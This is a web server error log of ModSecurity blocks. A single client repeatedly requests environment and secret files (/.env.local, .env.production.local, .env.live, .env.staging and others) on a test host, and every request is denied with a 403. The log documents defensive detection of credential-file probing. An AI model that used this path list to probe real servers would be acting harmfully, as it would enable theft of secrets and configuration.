[Mon May 26 22:42:47.683935 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aDTSR1NfyYOYBczX3ejM6AAAAAo"], referer: http://surf.test.indacotrentino.com/.env.production.local
[Mon May 26 22:42:47.684128 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aDTSR1NfyYOYBczX3ejM6AAAAAo"], referer: http://surf.test.indacotrentino.com/.env.production.local
[Mon May 26 22:42:48.011203 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aDTSSFNfyYOYBczX3ejM6QAAAAo"], referer: http://surf.test.indacotrentino.com/.env.production.local
[Mon May 26 22:42:48.011496 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aDTSSFNfyYOYBczX3ejM6QAAAAo"], referer: http://surf.test.indacotrentino.com/.env.production.local
[Mon May 26 22:42:48.011693 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aDTSSFNfyYOYBczX3ejM6QAAAAo"], referer: http://surf.test.indacotrentino.com/.env.production.local
[Mon May 26 22:42:48.439342 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aDTSSFNfyYOYBczX3ejM6gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.local
[Mon May 26 22:42:48.439617 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aDTSSFNfyYOYBczX3ejM6gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.local
[Mon May 26 22:42:48.439802 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aDTSSFNfyYOYBczX3ejM6gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.local
[Mon May 26 22:42:48.767044 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aDTSSFNfyYOYBczX3ejM6wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.local
[Mon May 26 22:42:48.767331 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aDTSSFNfyYOYBczX3ejM6wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.local
[Mon May 26 22:42:48.767573 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aDTSSFNfyYOYBczX3ejM6wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.local
[Mon May 26 22:42:49.196845 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aDTSSVNfyYOYBczX3ejM7AAAAAo"], referer: http://surf.test.indacotrentino.com/.env.example
[Mon May 26 22:42:49.197134 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aDTSSVNfyYOYBczX3ejM7AAAAAo"], referer: http://surf.test.indacotrentino.com/.env.example
[Mon May 26 22:42:49.197327 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aDTSSVNfyYOYBczX3ejM7AAAAAo"], referer: http://surf.test.indacotrentino.com/.env.example
[Mon May 26 22:42:49.524795 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aDTSSVNfyYOYBczX3ejM7QAAAAo"], referer: http://surf.test.indacotrentino.com/.env.example
[Mon May 26 22:42:49.525093 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aDTSSVNfyYOYBczX3ejM7QAAAAo"], referer: http://surf.test.indacotrentino.com/.env.example
[Mon May 26 22:42:49.525311 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aDTSSVNfyYOYBczX3ejM7QAAAAo"], referer: http://surf.test.indacotrentino.com/.env.example
[Mon May 26 22:42:49.954160 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aDTSSVNfyYOYBczX3ejM7gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.stage
[Mon May 26 22:42:49.954453 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aDTSSVNfyYOYBczX3ejM7gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.stage
[Mon May 26 22:42:49.954646 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aDTSSVNfyYOYBczX3ejM7gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.stage
[Mon May 26 22:42:50.282347 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aDTSSlNfyYOYBczX3ejM7wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.stage
[Mon May 26 22:42:50.282659 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aDTSSlNfyYOYBczX3ejM7wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.stage
[Mon May 26 22:42:50.282875 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aDTSSlNfyYOYBczX3ejM7wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.stage
[Mon May 26 22:42:50.711104 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aDTSSlNfyYOYBczX3ejM8AAAAAo"], referer: http://surf.test.indacotrentino.com/.env.live
[Mon May 26 22:42:50.711372 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aDTSSlNfyYOYBczX3ejM8AAAAAo"], referer: http://surf.test.indacotrentino.com/.env.live
[Mon May 26 22:42:50.711587 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aDTSSlNfyYOYBczX3ejM8AAAAAo"], referer: http://surf.test.indacotrentino.com/.env.live
[Mon May 26 22:42:51.039097 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aDTSS1NfyYOYBczX3ejM8QAAAAo"], referer: http://surf.test.indacotrentino.com/.env.live
[Mon May 26 22:42:51.039391 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aDTSS1NfyYOYBczX3ejM8QAAAAo"], referer: http://surf.test.indacotrentino.com/.env.live
[Mon May 26 22:42:51.039589 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aDTSS1NfyYOYBczX3ejM8QAAAAo"], referer: http://surf.test.indacotrentino.com/.env.live
[Mon May 26 22:42:51.468186 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aDTSS1NfyYOYBczX3ejM8gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.test
[Mon May 26 22:42:51.468483 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aDTSS1NfyYOYBczX3ejM8gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.test
[Mon May 26 22:42:51.468670 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aDTSS1NfyYOYBczX3ejM8gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.test
[Mon May 26 22:42:51.796126 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aDTSS1NfyYOYBczX3ejM8wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.test
[Mon May 26 22:42:51.796408 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aDTSS1NfyYOYBczX3ejM8wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.test
[Mon May 26 22:42:51.796629 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aDTSS1NfyYOYBczX3ejM8wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.test
[Mon May 26 22:42:52.224442 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aDTSTFNfyYOYBczX3ejM9AAAAAo"], referer: http://surf.test.indacotrentino.com/.env.staging
[Mon May 26 22:42:52.224709 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aDTSTFNfyYOYBczX3ejM9AAAAAo"], referer: http://surf.test.indacotrentino.com/.env.staging
[Mon May 26 22:42:52.224905 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aDTSTFNfyYOYBczX3ejM9AAAAAo"], referer: http://surf.test.indacotrentino.com/.env.staging
